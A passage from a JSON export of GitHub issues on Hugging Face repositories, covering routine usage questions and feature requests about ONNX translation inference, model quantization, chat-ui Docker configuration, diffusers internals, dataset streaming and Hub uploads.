https://www.kaggle.com/code/weililong/google-t5-t5-base \r\nI don't know whether there are any pitfalls.", "url": "https://github.com/huggingface/transformers/issues/33232", "state": "open", "labels": [ "Usage", "Feature request" ], "created_at": "2024-08-31T07:41:18Z", "updated_at": "2024-09-09T08:45:50Z", "user": "gg22mm" }, { "repo": "huggingface/transformers", "number": 33228, "title": "How to obtain batch index of validation dataset?", "body": "Hi,\r\n\r\nI wanted to know how we would fetch the batch id/index of the eval dataset in `preprocess_logits_for_metrics()`.\r\n\r\nThanks in advance!", "url": "https://github.com/huggingface/transformers/issues/33228", "state": "closed", "labels": [ "Usage" ], "created_at": "2024-08-31T00:11:13Z", "updated_at": "2024-10-13T08:04:26Z", "user": "SoumiDas" }, { "repo": "huggingface/transformers", "number": 33210, "title": "The model's address is https://huggingface.co/Xenova/nllb-200-distilled-600M/tree/main/onnx. I don't know how to load encoder.onnx and decoder.onnx and successfully translate a sentence into another language. Can you help me write inference code to achieve translation through the encoder and decoder? Thank you", "body": "### Feature request\n\nHello, the model's address is https://huggingface.co/Xenova/nllb-200-distilled-600M/tree/main/onnx. I don't know how to load encoder.onnx and decoder.onnx and successfully translate a sentence into another language. Can you help me write inference code to achieve translation through the encoder and decoder? 
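A minimal greedy-decoding sketch (hypothetical: it assumes `onnxruntime`, the Optimum-style tensor names `input_ids` / `attention_mask` / `encoder_hidden_states` / `logits`, a non-merged decoder export, and the usual NLLB start sequence of the eos token plus the target-language token; verify all of these against `session.get_inputs()` and the model config before relying on it):

```python
import numpy as np
import onnxruntime as ort
from transformers import AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained("Xenova/nllb-200-distilled-600M", src_lang="eng_Latn")
encoder = ort.InferenceSession("onnx/encoder_model.onnx")
decoder = ort.InferenceSession("onnx/decoder_model.onnx")

inputs = tokenizer("Hello, how are you?", return_tensors="np")
enc_out = encoder.run(None, {
    "input_ids": inputs["input_ids"],
    "attention_mask": inputs["attention_mask"],
})[0]

# Assumed start sequence: eos token, then the forced target-language token.
decoder_ids = np.array(
    [[tokenizer.eos_token_id, tokenizer.convert_tokens_to_ids("fra_Latn")]],
    dtype=np.int64,
)
for _ in range(64):  # greedy decoding, one token per step (no KV cache)
    logits = decoder.run(None, {
        "input_ids": decoder_ids,
        "encoder_hidden_states": enc_out,
        "encoder_attention_mask": inputs["attention_mask"],
    })[0]
    next_id = int(logits[0, -1].argmax())
    decoder_ids = np.concatenate([decoder_ids, [[next_id]]], axis=1).astype(np.int64)
    if next_id == tokenizer.eos_token_id:
        break

print(tokenizer.decode(decoder_ids[0], skip_special_tokens=True))
```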
Thank you!\n\n### Motivation\n\nSame as the feature request above.\n\n### Your contribution\n\nSame as the feature request above.", "url": "https://github.com/huggingface/transformers/issues/33210", "state": "open", "labels": [ "Feature request" ], "created_at": "2024-08-30T09:33:01Z", "updated_at": "2024-10-22T07:18:15Z", "user": "pengpengtao" }, { "repo": "huggingface/dataset-viewer", "number": 3054, "title": "Image URL detection", "body": "[`is_image_url`](https://github.com/huggingface/dataset-viewer/blob/946b0788fa426007161f2077a70b5ae64b211cf8/libs/libcommon/src/libcommon/utils.py#L131-L134) relies on a filename and extension being present; however, in some cases an image URL does not contain a filename. Example [dataset](https://huggingface.co/datasets/bigdata-pw/SteamScreenshots) and example [URL](https://steamuserimages-a.akamaihd.net/ugc/910172100453203507/062F4787060B2E4E93EFC4631E96183B027A860B/). This could be improved by checking the `content-type` header of the response or checking for strings like \"image\" in the URL.", "url": "https://github.com/huggingface/dataset-viewer/issues/3054", "state": "open", "labels": [ "question", "improvement / optimization", "P2" ], "created_at": "2024-08-29T23:17:55Z", "updated_at": "2025-07-04T09:37:23Z", "user": "hlky" }, { "repo": "huggingface/transformers.js", "number": 911, "title": "Next.js example breaks with v3", "body": "### Question\n\nAre there steps documented anywhere for running V3 in your app? I'm trying to test it out via these steps:\r\n\r\n1. Pointing to the alpha in my `package.json`: `\"@huggingface/transformers\": \"^3.0.0-alpha.10\",`\r\n2. `npm i`\r\n3. `cd node_modules/@huggingface/transformers && npm i`\r\n4. Copy the [webpack.config.js](https://github.com/xenova/transformers.js/blob/main/webpack.config.js) from the repo into the node_modules/@huggingface/transformers dir.\r\n5. `npm run build` in the node_modules/@huggingface/transformers dir.\r\n\r\nI then run my app, and get the following error:\r\n```\r\nERROR in ../../node_modules/@huggingface/transformers/dist/transformers.js 42256:34-64\r\nModule not found: Error: Can't resolve './' in '/node_modules/@huggingface/transformers/dist'\r\nwebpack compiled with 1 error\r\n```\r\n\r\nThanks, I'm excited to test out the latest and greatest!", "url": "https://github.com/huggingface/transformers.js/issues/911", "state": "closed", "labels": [ "question" ], "created_at": "2024-08-29T20:17:03Z", "updated_at": "2025-02-16T12:35:47Z", "user": "stinoga" }, { "repo": "huggingface/diffusers", "number": 9317, "title": "Finetuning on dataset", "body": "Dear @thedarkzeno and @patil-suraj,\r\n\r\nThank you so much for putting your work out there. 
I wanted to ask: how would training work on a dataset rather than on a single instance image, as in train_dreambooth_inpaint? And can I finetune models trained with the https://github.com/CompVis/latent-diffusion repository?\r\n\r\nThanks in advance", "url": "https://github.com/huggingface/diffusers/issues/9317", "state": "closed", "labels": [ "stale" ], "created_at": "2024-08-29T12:20:51Z", "updated_at": "2024-10-23T16:10:47Z", "comments": 4, "user": "ultiwinter" }, { "repo": "huggingface/optimum-quanto", "number": 300, "title": "How to quantize, save and load a Stable Diffusion 3 model", "body": "import torch\r\n\r\nfrom optimum.quanto import qint2, qint4, qint8, quantize, freeze\r\n\r\nfrom diffusers import StableDiffusion3Pipeline\r\n\r\n\r\npipe = StableDiffusion3Pipeline.from_pretrained(\"stabilityai/stable-diffusion-3-medium-diffusers\", torch_dtype=torch.bfloat16)\r\n\r\nquantize(pipe.text_encoder, weights=qint4)\r\nfreeze(pipe.text_encoder)\r\n\r\nquantize(pipe.text_encoder_3, weights=qint4)\r\nfreeze(pipe.text_encoder_3)\r\n\r\nquantize(pipe.transformer, weights=qint8, exclude=\"proj_out\")\r\nfreeze(pipe.transformer)\r\n\r\npipe = pipe.to(\"cuda\")\r\npipe.save_pretrained(\"/content/drive/MyDrive/quantized_Stable_diffusion_1\")\r\n\r\nAfter saving, how can I load this model from this directory and perform text-to-image generation?", "url": "https://github.com/huggingface/optimum-quanto/issues/300", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-08-29T06:24:02Z", "updated_at": "2024-10-06T02:06:30Z", "user": "jainrahul52" }, { "repo": "huggingface/optimum", "number": 2002, "title": "Is it possible to infer the model separately through encoder.onnx and decoder.onnx", "body": "### Feature request\n\nIs it possible to run inference on the model separately through encoder.onnx and decoder.onnx?\n\n### Motivation\n\nSame as above.\n\n### Your contribution\n\nSame as above.", "url": "https://github.com/huggingface/optimum/issues/2002", "state": "open", "labels": [ "onnx" ], "created_at": "2024-08-29T03:26:20Z", "updated_at": "2024-10-08T15:28:59Z", "comments": 0, "user": "pengpengtao" }, { "repo": "huggingface/diffusers", "number": 9303, "title": "[Add] VEnhancer - the interpolation and upscaler for CogVideoX-5b", "body": "### Model/Pipeline/Scheduler description\n\nVEnhancer, a generative space-time enhancement framework that can improve existing T2V results.\r\n\r\nhttps://github.com/Vchitect/VEnhancer\n\n### Open source status\n\n- [X] The model implementation is available.\n- [X] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9303", "state": "open", "labels": [ "stale" ], "created_at": "2024-08-28T14:43:32Z", "updated_at": "2024-12-11T15:04:32Z", "comments": 3, "user": "tin2tin" }, { "repo": "huggingface/text-generation-inference", "number": 2466, "title": "Guide on how to use TensorRT-LLM Backend", "body": "### Feature request\n\nDoes any documentation exist, or would it be possible to add documentation, on how to use the TensorRT-LLM backend? 
#2458 makes mention that the TRT-LLM backend exists, and I can see that there's a Dockerfile for TRT-LLM, but I don't see any guides on how to build/use it.\n\n### Motivation\n\nI would like to run TensorRT-LLM models using TGI.\n\n### Your contribution\n\nI'm willing to test any builds/processes/pipelines that are available.", "url": "https://github.com/huggingface/text-generation-inference/issues/2466", "state": "open", "labels": [], "created_at": "2024-08-28T13:24:26Z", "updated_at": "2025-05-18T16:23:14Z", "user": "michaelthreet" }, { "repo": "huggingface/lerobot", "number": 390, "title": "[Feature Request] Add end effector pos field in lerobot dataset?", "body": "Aloha style joint space dataset will limit data set to the specific robot. Can we change joint space data or add a field of end effector to cartesian space data base on the robot URDF file?\r\n\r\nIt may help robotics community build a more generalized policy.", "url": "https://github.com/huggingface/lerobot/issues/390", "state": "closed", "labels": [ "question", "dataset", "robots" ], "created_at": "2024-08-28T13:19:15Z", "updated_at": "2024-08-29T09:55:27Z", "user": "hilookas" }, { "repo": "huggingface/datasets", "number": 7129, "title": "Inconsistent output in documentation example: `num_classes` not displayed in `ClassLabel` output", "body": "In the documentation for [ClassLabel](https://huggingface.co/docs/datasets/v2.21.0/en/package_reference/main_classes#datasets.ClassLabel), there is an example of usage with the following code:\r\n\r\n````\r\nfrom datasets import Features\r\nfeatures = Features({'label': ClassLabel(num_classes=3, names=['bad', 'ok', 'good'])})\r\nfeatures\r\n````\r\n\r\nwhich expects to output (as stated in the documentation):\r\n\r\n````\r\n{'label': ClassLabel(num_classes=3, names=['bad', 'ok', 'good'], id=None)}\r\n````\r\n\r\nbut it generates the following\r\n\r\n````\r\n{'label': ClassLabel(names=['bad', 'ok', 'good'], id=None)}\r\n````\r\n\r\nIf my understanding is correct, this happens because although num_classes is used during the init of the object, it is afterward ignored:\r\n\r\nhttps://github.com/huggingface/datasets/blob/be5cff059a2a5b89d7a97bc04739c4919ab8089f/src/datasets/features/features.py#L975\r\n\r\nI would like to work on this issue if this is something needed \ud83d\ude04\r\n", "url": "https://github.com/huggingface/datasets/issues/7129", "state": "closed", "labels": [], "created_at": "2024-08-28T12:27:48Z", "updated_at": "2024-12-06T11:32:02Z", "comments": 0, "user": "sergiopaniego" }, { "repo": "huggingface/diffusers", "number": 9299, "title": "CUDAGRAPHs for Flux position embeddings", "body": "@yiyixuxu \r\n\r\nIs it possible to refactor the Flux positional embeddings so that we can fully make use of CUDAGRAPHs? \r\n\r\n```bash\r\nskipping cudagraphs due to skipping cudagraphs due to cpu device (device_put). Found from : \r\n File \"/home/sayak/diffusers/src/diffusers/models/transformers/transformer_flux.py\", line 469, in forward\r\n image_rotary_emb = self.pos_embed(ids)\r\n File \"/home/sayak/.pyenv/versions/diffusers/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1562, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/home/sayak/diffusers/src/diffusers/models/embeddings.py\", line 630, in forward\r\n self.axes_dim[i], pos[:, i], repeat_interleave_real=True, use_real=True, freqs_dtype=freqs_dtype\r\n```\r\n\r\n
\r\nCode:\r\n\r\n```python\r\nimport torch\r\n\r\ntorch.set_float32_matmul_precision(\"high\")\r\ntorch._inductor.conv_1x1_as_mm = True\r\ntorch._inductor.coordinate_descent_tuning = True\r\ntorch._inductor.epilogue_fusion = False\r\ntorch._inductor.coordinate_descent_check_all_directions = True\r\n\r\nimport diffusers\r\nfrom platform import python_version\r\nfrom diffusers import DiffusionPipeline\r\n\r\nprint(diffusers.__version__)\r\nprint(torch.__version__)\r\nprint(python_version())\r\n\r\n\r\npipe = DiffusionPipeline.from_pretrained(\"black-forest-labs/FLUX.1-dev\", torch_dtype=torch.bfloat16).to(\"cuda\")\r\npipe.transformer.to(memory_format=torch.channels_last)\r\npipe.vae.to(memory_format=torch.channels_last)\r\n\r\npipe.transformer = torch.compile(pipe.transformer, mode=\"max-autotune\", fullgraph=True)\r\npipe.vae.decode = torch.compile(pipe.vae.decode, mode=\"max-autotune\", fullgraph=True)\r\n\r\nfor _ in range(5):\r\n image = pipe(\r\n \"Happy bear\",\r\n num_inference_steps=5,\r\n guidance_scale=3.5,\r\n max_sequence_length=512,\r\n generator=torch.manual_seed(42),\r\n height=1024,\r\n width=1024,\r\n ).images[0]\r\n```\r\n\r\n
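One hypothetical direction (not a diffusers API, just a sketch): memoize the rotary embedding per ids shape so the CPU-side frequency math runs once, and keep `pos_embed` outside the compiled region (e.g. compile the transformer blocks rather than the whole module), since a Python-level cache inside a `fullgraph=True` region would itself graph-break:

```python
import torch

def cache_flux_rope(transformer):
    """Hypothetical monkey-patch: memoize pos_embed outputs per ids shape.
    Only valid when the ids content is constant for a given shape (fixed
    resolution and prompt length), and only useful if pos_embed stays
    outside the torch.compile'd region."""
    original_forward = transformer.pos_embed.forward
    cache = {}

    def cached_forward(ids):
        key = (tuple(ids.shape), str(ids.device))
        if key not in cache:
            with torch.no_grad():
                cache[key] = original_forward(ids)  # CPU-heavy work runs once
        return cache[key]

    transformer.pos_embed.forward = cached_forward
```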
\r\n\r\n\r\nIf we can fully make use of CUDAGRAPHs, `torch.compile()` would be faster. ", "url": "https://github.com/huggingface/diffusers/issues/9299", "state": "closed", "labels": [], "created_at": "2024-08-28T11:33:16Z", "updated_at": "2024-08-29T19:37:17Z", "comments": 0, "user": "sayakpaul" }, { "repo": "huggingface/transformers.js", "number": 906, "title": "Unsupported model type: jais", "body": "### Question\n\n### System Info\r\nmacOS, node v20.10, @xenova/transformers 2.17.2\r\n\r\n### Environment/Platform\r\n- [ ] Website/web-app\r\n- [ ] Browser extension\r\n- [x] Server-side (e.g., Node.js, Deno, Bun)\r\n- [ ] Desktop app (e.g., Electron)\r\n- [ ] Other (e.g., VSCode extension)\r\n\r\n### Description\r\n```\r\nError: Unsupported model type: jais\r\n at Function.from_pretrained (file:///node_modules/@xenova/transformers/src/models.js:5526:19)\r\n at async Promise.all (index 1)\r\n at loadItems (file:///node_modules/@xenova/transformers/src/pipelines.js:3279:5)\r\n at pipeline (file:///node_modules/@xenova/transformers/src/pipelines.js:3219:21)\r\n at SearchQueryParser.initializeModel (src/search-engine/query-parser/search-query-parser.ts:27:18)\r\n``` \r\n\r\n### Reproduction\r\n```javascript\r\nimport { Logger } from '@nestjs/common';\r\n\r\nexport class SearchQueryParser {\r\n private tokenizer: any;\r\n private model: any;\r\n private logger: Logger;\r\n private systemPrompt = '';\r\n\r\n constructor() {\r\n this.logger = new Logger('query parser');\r\n this.initializeModel();\r\n }\r\n\r\n private async initializeModel() {\r\n const { AutoTokenizer, pipeline } = await import('@xenova/transformers');\r\n this.tokenizer = await AutoTokenizer.from_pretrained(\r\n 'omarabb315/Query-5KM-no_synonyms_noon_1',\r\n {\r\n progress_callback: (data) => {\r\n this.logger.verbose(\r\n `${data.status} ${data.file || ''} ${data.progress || ''}`,\r\n );\r\n },\r\n },\r\n );\r\n this.model = await pipeline(\r\n 'text-generation',\r\n 'omarabb315/Query-5KM-no_synonyms_noon_1',\r\n );\r\n }\r\n\r\n async parse(query: string): Promise<string> {\r\n if (!this.model) {\r\n await this.initializeModel();\r\n }\r\n\r\n const tokenizerResponse = this.tokenizer.apply_chat_template(\r\n [\r\n { role: 'system', content: this.systemPrompt },\r\n { role: 'user', content: query },\r\n ],\r\n {\r\n tokenize: false,\r\n add_generation_prompt: true,\r\n },\r\n );\r\n\r\n const response = await this.model(tokenizerResponse.toString());\r\n\r\n const parsedQuery = response[0].generated_text;\r\n\r\n return parsedQuery;\r\n }\r\n}\r\n```\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/906", "state": "closed", "labels": [ "question" ], "created_at": "2024-08-28T09:46:17Z", "updated_at": "2024-08-28T21:01:10Z", "user": "SherifElfadaly" }, { "repo": "huggingface/trl", "number": 1986, "title": "How to convert DPO data to KTO data", "body": "### Feature request\n\nHow can I convert DPO data to KTO data?\n\n### Motivation\n\nHow can I convert DPO data to KTO data?\n\n### Your contribution\n\nHow can I convert DPO data to KTO data?", "url": "https://github.com/huggingface/trl/issues/1986", "state": "closed", "labels": [], "created_at": "2024-08-28T06:23:13Z", "updated_at": "2024-08-28T09:02:35Z", "user": "dotsonliu" }, { "repo": "huggingface/datasets", "number": 7128, "title": "Filter Large Dataset Entry by Entry", "body": "### Feature request\n\nI am not sure if this is a new feature, but I wanted to post this problem here and hear if others have ways of optimizing and speeding up this process.\r\n\r\nLet's say I have a really 
large dataset that I cannot load into memory. At this point, I am only aware of `streaming=True` to load the dataset. Now, the dataset consists of many tables. Ideally, I would want to have some simple filtering criterion, such that I only see the \"good\" tables. Here is an example of what the code might look like:\r\n\r\n```\r\nfrom itertools import islice\r\nfrom datasets import load_dataset\r\n\r\ndataset = load_dataset(\r\n \"really-large-dataset\",\r\n streaming=True\r\n)\r\n# And let's say we process the dataset bit by bit because we want intermediate results\r\ndataset = islice(dataset, 10000)\r\n\r\n# Define a function to filter the data\r\n# (some_condition is a placeholder for whatever predicate marks a \"good\" table)\r\ndef filter_function(table):\r\n if some_condition:\r\n return True\r\n else:\r\n return False\r\n\r\n# Use the filter function on your dataset\r\nfiltered_dataset = (ex for ex in dataset if filter_function(ex))\r\n```\r\n\r\nAnd then I work on the processed dataset, which would be orders of magnitude faster than working on the original. I would love to hear if the problem setup + solution makes sense to people, and if anyone has suggestions!\n\n### Motivation\n\nSee description above\n\n### Your contribution\n\nHappy to make a PR if this is a new feature", "url": "https://github.com/huggingface/datasets/issues/7128", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-08-27T20:31:09Z", "updated_at": "2024-10-07T23:37:44Z", "comments": 4, "user": "QiyaoWei" }, { "repo": "huggingface/huggingface_hub", "number": 2491, "title": "How to upload folders into a repo in the most effective way - on error continue/resume, max speed", "body": "Hello. I have the below tasks for uploading; however, I am not sure if they are the most effective way of doing this.\r\n\r\n#### This cell is used to upload a single file into a repo with a certain name\r\n\r\n```\r\n\r\nfrom huggingface_hub import HfApi\r\napi = HfApi()\r\napi.upload_file(\r\n path_or_fileobj=r\"/home/Ubuntu/apps/stable-diffusion-webui/models/Stable-diffusion/model_name.safetensors\",\r\n path_in_repo=\"model_name.safetensors\",\r\n repo_id=\"YourUserName/reponame\",\r\n repo_type=\"model\",\r\n)\r\n```\r\n\r\n\r\n#### This cell is used to upload a folder into a repo with a single commit\r\n\r\n```\r\nfrom huggingface_hub import HfApi\r\napi = HfApi()\r\napi.upload_folder(\r\n folder_path=r\"/home/Ubuntu/apps/stable-diffusion-webui/models/Stable-diffusion\",\r\n repo_id=\"YourUserName/reponame\",\r\n repo_type=\"model\",\r\n)\r\n```\r\n\r\nThis one is especially slow whenever I run it. 
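\r\nOne thing that may help with the slow folder upload (an assumption on my part, not something benchmarked on this exact setup): enabling the Rust-based `hf_transfer` backend, which `huggingface_hub` picks up from an environment variable and which mainly speeds up large-file transfers:\r\n\r\n```python\r\nimport os\r\n\r\n# Requires `pip install hf_transfer`; the flag must be set before\r\n# huggingface_hub is imported.\r\nos.environ[\"HF_HUB_ENABLE_HF_TRANSFER\"] = \"1\"\r\n\r\nfrom huggingface_hub import HfApi\r\n\r\napi = HfApi()\r\napi.upload_folder(\r\n    folder_path=r\"/home/Ubuntu/apps/stable-diffusion-webui/models/Stable-diffusion\",\r\n    repo_id=\"YourUserName/reponame\",\r\n    repo_type=\"model\",\r\n)\r\n```\r\n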
I think it re-calculates the SHA to check whether files were modified.\r\n\r\n#### This cell uploads a folder into a remote repo with multiple commits\r\n#### Supports resuming, so if it gets interrupted you can run it again to continue\r\n```\r\n\r\nfrom huggingface_hub import upload_folder\r\n\r\nupload_folder(\r\n folder_path=r\"/home/Ubuntu/apps/stable-diffusion-webui/models/Stable-diffusion\",\r\n repo_id=\"YourUserName/reponame\",\r\n repo_type=\"model\",\r\n multi_commits=True,\r\n multi_commits_verbose=True,\r\n)\r\n\r\n\r\n\r\n```\r\n\r\n", "url": "https://github.com/huggingface/huggingface_hub/issues/2491", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-27T16:36:04Z", "updated_at": "2024-08-28T08:24:22Z", "user": "FurkanGozukara" }, { "repo": "huggingface/Google-Cloud-Containers", "number": 73, "title": "Download model files from GCS (Instead of HF Hub)", "body": "When deploying an HF model to Vertex AI, I would like to download a fine-tuned model from GCS, instead of from HF Hub, like so:\r\n\r\n```\r\nmodel = aiplatform.Model.upload(\r\n display_name=\"my-model\",\r\n serving_container_image_uri=os.getenv(\"CONTAINER_URI\"),\r\n serving_container_environment_variables={\r\n \"AIP_STORAGE_URI\": \"gs://path/to/model/files\",\r\n },\r\n serving_container_ports=[8080],\r\n)\r\nmodel.wait()\r\n```\r\n\r\nI would expect this to be supported since the entrypoint script logic should handle this: https://github.com/huggingface/Google-Cloud-Containers/blob/main/containers/tei/cpu/1.4.0/entrypoint.sh \r\n\r\nWill this be supported when V1.4 is released? 
When will this be?", "url": "https://github.com/huggingface/Google-Cloud-Containers/issues/73", "state": "closed", "labels": [ "tei", "question" ], "created_at": "2024-08-27T12:14:10Z", "updated_at": "2024-09-16T07:07:11Z", "user": "rm-jeremyduplessis" }, { "repo": "huggingface/chat-ui", "number": 1436, "title": "MODELS=`[ variable problem when I docker run", "body": "Hello,\r\n\r\nI want to use Ollama to run the Mistral model, and I followed the documentation below: https://huggingface.co/docs/chat-ui/configuration/models/providers/ollama \r\n\r\n`deploy.sh`:\r\n\r\n```sh\r\n#!/bin/bash\r\n\r\nsudo docker compose down\r\nsudo docker rm -f mongodb && sudo docker rm -f chat-ui\r\n\r\n# nginx and ollama\r\nsudo docker compose up -d\r\n\r\n# mongodb\r\nsudo docker run -d -p 27017:27017 -v mongodb-data:/data/db --name mongodb --network backend mongo:latest\r\n\r\n# chat-ui\r\nsudo docker run -d -p 3000:3000 --env-file .env.local -v chat-ui:/data --name chat-ui --network proxy ghcr.io/huggingface/chat-ui-db && sudo docker network connect backend chat-ui\r\n```\r\n`docker-compose.yml`:\r\n\r\n```YAML\r\nservices:\r\n nginx:\r\n image: nginx:latest\r\n container_name: nginx\r\n ports:\r\n - 80:80\r\n - 443:443\r\n networks:\r\n - proxy\r\n volumes:\r\n - ./nginx:/etc/nginx/conf.d\r\n - ./ssl:/etc/ssl\r\n restart: unless-stopped\r\n\r\n ollama:\r\n build:\r\n context: ./ollama\r\n dockerfile: Dockerfile\r\n image: ollama-with-ca\r\n container_name: ollama\r\n ports:\r\n - 11434:11434\r\n networks:\r\n - backend\r\n environment:\r\n - HTTPS_PROXY=http://:@proxy.test.fr:8090\r\n volumes:\r\n - ollama-data:/data\r\n restart: unless-stopped\r\n entrypoint: [\"/bin/bash\", \"start-mistral.sh\"]\r\n\r\nnetworks:\r\n backend:\r\n proxy:\r\n external: true\r\n\r\nvolumes:\r\n ollama-data:\r\n```\r\n\r\n`.env.local`:\r\n\r\n```\r\nMONGODB_URL=mongodb://mongodb:27017\r\nHF_TOKEN=hf_*****\r\n\r\nMODELS=`[\r\n {\r\n \"name\": \"Ollama Mistral\",\r\n \"chatPromptTemplate\": \"{{#each messages}}{{#ifUser}}[INST] {{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}} {{content}} [/INST]{{/ifUser}}{{#ifAssistant}}{{content}} {{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 3072,\r\n \"max_new_tokens\": 1024,\r\n \"stop\": [\"
\"]\r\n },\r\n \"endpoints\": [\r\n {\r\n \"type\": \"ollama\",\r\n \"url\" : \"ollama://ollama:11434\",\r\n \"ollamaName\" : \"mistral\"\r\n }\r\n ]\r\n }\r\n]`\r\n```\r\n\r\nWhen I start my script, at the end of the execution the container doesn't launch, and I get the following error:\r\n\r\n```sh\r\ndocker: poorly formatted environment: variable '\"name\": \"Ollama Mistral\",' contains whitespaces.\r\nSee 'docker run --help'.\r\n```\r\n\r\nI have already tried putting the `chat-ui` and `mongodb` containers in the `docker-compose.yml`, and it doesn't work, the same as in this issue: https://github.com/huggingface/chat-ui/issues/614 \r\n\r\nAny solutions?\r\n\r\nThanks in advance.\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1436", "state": "closed", "labels": [ "support" ], "created_at": "2024-08-26T14:00:26Z", "updated_at": "2024-08-27T11:04:39Z", "comments": 5, "user": "avirgos" }, { "repo": "huggingface/diffusers", "number": 9276, "title": "How can I manually update some checkpoints of UNet2/3DConditionModel objects?", "body": "### Discussed in https://github.com/huggingface/diffusers/discussions/9273\r\n\r\n
\r\n\r\nOriginally posted by **justin4ai** August 26, 2024\r\nHello, I'm quite new to the diffusers package and trying to implement fine-tuning code that uses saved checkpoints of models initialized with the ```UNet2/3DConditionModel.from_pretrained``` method, as shown below:\r\n\r\n```python\r\n\r\n reference_unet = UNet2DConditionModel.from_pretrained( # ReferenceNet only receives the 2D condition (reference image via CLIP)\r\n cfg.base_model_path,\r\n subfolder=\"unet\",\r\n ).to(device=\"cuda\")\r\n\r\n denoising_unet = UNet3DConditionModel.from_pretrained_2d(\r\n cfg.base_model_path,\r\n \"\",\r\n subfolder=\"unet\",\r\n unet_additional_kwargs={\r\n \"use_motion_module\": False,\r\n \"unet_use_temporal_attention\": False, \r\n },\r\n ).to(device=\"cuda\")\r\n\r\n prev = denoising_unet.state_dict()\r\n\r\n li = torch.load(\"./pretrained_weights/denoising_unet.pth\")\r\n\r\n for key in li:\r\n denoising_unet[key] = li[key] # I know this kind of direct assigning to the object doesn't make sense though.\r\n reference_unet.load_state_dict(torch.load(\"./pretrained_weights/reference_unet.pth\"))\r\n\r\n```\r\n\r\nThe checkpoint I am trying to load was saved from a previous training run of the ```UNet2/3DConditionModel``` objects with ```state_dict = model.state_dict()``` and ```torch.save(state_dict, save_path)```. But I have no idea how to directly assign certain values to specific layers in those class objects.\r\n\r\nIf you help me out with this, I will be very glad! Looking forward to your help. Also, please let me know if my description of the situation is not enough for you to help me out.\r\n\r\nCheers,\r\nJustin
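\r\n\r\nA minimal sketch of the usual pattern (my addition, assuming the saved keys match the model's): load the whole dict back with `load_state_dict`, or a filtered dict for specific layers, instead of assigning into the module object:\r\n\r\n```python\r\nimport torch\r\n\r\nstate = torch.load(\"./pretrained_weights/denoising_unet.pth\", map_location=\"cpu\")\r\n\r\n# strict=False tolerates missing/extra keys and reports them back.\r\nmissing, unexpected = denoising_unet.load_state_dict(state, strict=False)\r\nprint(\"missing:\", missing, \"unexpected:\", unexpected)\r\n\r\n# To overwrite only certain layers, filter by key prefix first\r\n# (\"conv_in.\" is just an example prefix, not taken from the checkpoint):\r\npartial = {k: v for k, v in state.items() if k.startswith(\"conv_in.\")}\r\ndenoising_unet.load_state_dict(partial, strict=False)\r\n```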
", "url": "https://github.com/huggingface/diffusers/issues/9276", "state": "open", "labels": [ "stale" ], "created_at": "2024-08-26T07:49:23Z", "updated_at": "2024-09-25T15:03:01Z", "comments": 1, "user": "justin4ai" }, { "repo": "huggingface/transformers", "number": 33115, "title": "How to get the score of each token when using pipeline", "body": "pipe = pipeline(\r\n \"text-generation\",\r\n model=model,\r\n tokenizer=tokenizer,\r\n max_new_tokens=512,\r\n do_sample=True,\r\n temperature=0.7,\r\n top_p=0.95,\r\n top_k=40,\r\n repetition_penalty=1.1,\r\n output_scores=True\r\n)\r\n\r\nThe model I use is Qwen2-7B-Instruct. When I try to output the score of each token by modifying the parameters, it doesn't work.", "url": "https://github.com/huggingface/transformers/issues/33115", "state": "closed", "labels": [ "Usage" ], "created_at": "2024-08-26T07:00:54Z", "updated_at": "2025-03-06T08:23:58Z", "user": "xin0623" }, { "repo": "huggingface/diffusers", "number": 9271, "title": "The different quality between ComfyUI and Diffusers ?", "body": "### Discussed in https://github.com/huggingface/diffusers/discussions/9265\r\n\r\n
\r\n\r\nOriginally posted by **vuongminh1907** August 25, 2024\r\nI had a problem using InstantID (https://github.com/instantX-research/InstantID), which uses Diffusers as its base. Additionally, I tried ComfyUI (https://github.com/cubiq/ComfyUI_InstantID), and I think the quality of the images was better there.\r\n\r\nI discussed this with Cubiq, and he mentioned that there are no differences in how they applied the IP Adapter (https://github.com/cubiq/ComfyUI_InstantID/issues/206).\r\n\r\n![image](https://github.com/user-attachments/assets/a0ec4a7a-aad0-4575-8617-cdae8dea5f16)\r\n\r\nCan you explain this issue to me? Perhaps it\u2019s related to the Sampler in ComfyUI and Diffusers.", "url": "https://github.com/huggingface/diffusers/issues/9271", "state": "closed", "labels": [ "stale" ], "created_at": "2024-08-26T02:53:23Z", "updated_at": "2024-10-15T18:10:42Z", "comments": 3, "user": "vuongminh1907" }, { "repo": "huggingface/diffusers", "number": 9264, "title": "Could you make an inpainting model for Flux?", "body": "### Model/Pipeline/Scheduler description\n\nThe [stable-diffusion-xl-1.0-inpainting-0.1](https://huggingface.co/diffusers/stable-diffusion-xl-1.0-inpainting-0.1) model helps a lot. Could you make a similar inpainting model for Flux?\r\n\r\nhttps://huggingface.co/black-forest-labs/FLUX.1-dev\n\n### Open source status\n\n- [ ] The model implementation is available.\n- [ ] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\nhttps://huggingface.co/diffusers/stable-diffusion-xl-1.0-inpainting-0.1\r\nhttps://huggingface.co/black-forest-labs/FLUX.1-dev", "url": "https://github.com/huggingface/diffusers/issues/9264", "state": "closed", "labels": [], "created_at": "2024-08-24T17:32:32Z", "updated_at": "2024-08-24T17:37:59Z", "comments": 2, "user": "snowbedding" }, { "repo": "huggingface/transformers", "number": 33106, "title": "How to fine-tune TrOCR on a specific language - guide request", "body": "### Model description\n\nHello, I have looked through the issues and other resources, but none of them cover how to fine-tune TrOCR on a specific language - e.g., how to pick the encoder, the decoder, the model, etc.\r\nCould you, @NielsRogge, write simple instructions/a guide on this topic?\r\n\n\n### Open source status\n\n- [ ] The model implementation is available\n- [ ] The model weights are available\n\n### Provide useful links for the implementation\n\n_No response_", "url": 